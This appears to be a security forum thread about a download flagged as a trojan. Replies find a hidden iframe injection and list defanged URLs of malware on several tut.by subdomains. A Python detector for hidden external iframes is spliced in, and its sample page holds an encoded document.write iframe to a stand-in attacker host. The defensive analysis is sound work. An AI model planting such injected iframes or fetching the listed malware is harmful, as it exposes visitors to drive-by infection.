AIS is blocking the file spx-dxf.exe on this page
hxxp://xaraxtv.at.tut.by/spx.htm
claiming it’s a trojan, but I think it’s a false positive?
Can Avast confirm this?
There seems to be something else going on at the time of the download of that one file that doesn't happen with the other two: an iframe injection to reddii.org (see below). See image 1 of the decoded script file that is run when you click the spx-dxf.exe link.
http://www.mywot.com/en/scorecard/reddii.org and http://www.siteadvisor.com/sites/reddii.org/summary/
avast isn't the only AV scanner to find that script file suspect: 24 of 44 scanners (60%) do, see http://www.virustotal.com/analisis/1ebe1c0f91af0da6a6e73bc0c17b5eef3ecaededcc228f7feb9f62f3daf896a7-1278602534.
So, if nothing else, there is something strange happening with that download which isn't happening with the other two.
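The kind of finding described in the post above (an iframe to a third-party host, written by a decoded script into the download page) can be turned into a quick triage check. What follows is an added example, not code from the thread, from the site under discussion or from any of the scanners mentioned; the sample page, the hosts good.example and bad.example, and the function names are all constructed for illustration.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample page for this example: one normal embedded player and one
# percent-encoded, hidden iframe written via document.write(). It is not the
# content of the site discussed in the thread.
SAMPLE_PAGE = """<html><body>
<h1>Downloads</h1>
<iframe src="/player.html" width="640" height="360"></iframe>
<a href="spx-dxf.exe">spx-dxf.exe</a>
<script>
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example%2Fin.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%3Bposition%3Aabsolute%22%3E%3C%2Fiframe%3E"));
</script>
</body></html>"""

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
UNESCAPE_RE = re.compile(r'unescape\(\s*([\'"])(.*?)\1\s*\)', re.IGNORECASE | re.DOTALL)


def decode_layers(text, max_rounds=5):
    """Expand unescape("...") calls and stray %XX sequences, repeating a few
    times for nested layers, so an iframe assembled inside an encoded string
    becomes visible to the tag regex. This also decodes legitimate %XX in
    ordinary URLs, which is acceptable for a triage pass."""
    for _ in range(max_rounds):
        expanded = UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), text)
        expanded = unquote(expanded)
        if expanded == text:
            break
        text = expanded
    return text


def parse_attrs(attr_text):
    """Turn the inside of an <iframe ...> tag into a lowercase attribute dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ''
    return attrs


def is_hidden(attrs):
    """Heuristics drive-by iframes typically match: invisible via CSS, or
    sized to at most 1 pixel in either dimension (attribute or inline style)."""
    style = attrs.get('style', '').lower().replace(' ', '')
    if 'display:none' in style or 'visibility:hidden' in style:
        return True
    for dim in ('width', 'height'):
        m = re.match(r'\s*(\d+)', attrs.get(dim, ''))
        if m and int(m.group(1)) <= 1:
            return True
        m = re.search(dim + r':(\d+)', style)
        if m and int(m.group(1)) <= 1:
            return True
    return False


def find_suspicious_iframes(page_text, page_host):
    """Return iframes that are both hidden and point at a host other than the
    page's own (or its subdomains): the combination an injected iframe shows."""
    text = decode_layers(page_text)
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        src = attrs.get('src', '')
        host = (urlparse(src).hostname or '').lower()
        external = host not in ('', page_host) and not host.endswith('.' + page_host)
        if external and is_hidden(attrs):
            findings.append({'src': src, 'host': host, 'attrs': attrs})
    return findings


if __name__ == '__main__':
    for hit in find_suspicious_iframes(SAMPLE_PAGE, 'good.example'):
        print('hidden external iframe ->', hit['src'])
```

Run it against a saved copy of the page (fetched with a non-browser client, not by opening it in a browser) and the page's own hostname; a hit is a reason to escalate, not proof on its own, since the hidden frame may itself redirect further, as the wepawet and jsunpack reports in this thread are used to show.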
Hi zenzor,
Please make the link to the site non-clickable by putting hxtp or wXw.
Enough malware coming from there:
Threats found: 6
Here is a complete list:
Threat Name: Packed.Generic.114
Location: htxp://ironfist.at.tut.by/ipasetup.exe
Threat Name: Backdoor.Trojan
Location: htxp://ironfist.at.tut.by/guiz.exe
Threat Name: Suspicious.MH690
Location: htxp://ironfist.at.tut.by/zeratssl.zip
Threat Name: Trojan Horse
Location: htxp://ironfist.at.tut.by/rssbot.zip
Threat Name: Packed.Generic.114
Location: htxp://ironfist.at.tut.by/iparus.exe
Threat Name: JS.Qsiframe
Location: htxp://xaraxtv1.at.tut.by/spx-dxf.exe
Last detection found suspicious here: http://wepawet.iseclab.org/view.php?hash=9d2c42b038c610f57240def45c3c4a41&t=1278609680&type=js
See the VT report there: avast detects as HTML:IFrame-BN
polonus
P.S. also see: htxp://jsunpack.jeek.org/dec/go?report=852fb9a3aa290487ffb9fa4667ac6ac36451af9a
(Make clickable only for those that know what to do, have NS up and active in the browser)
Thanks for your replies. I’ve contacted the owner of the site, to get him to look into it. I’ll report back here when things have been cleared up.
thanks!
Rich
You’re welcome.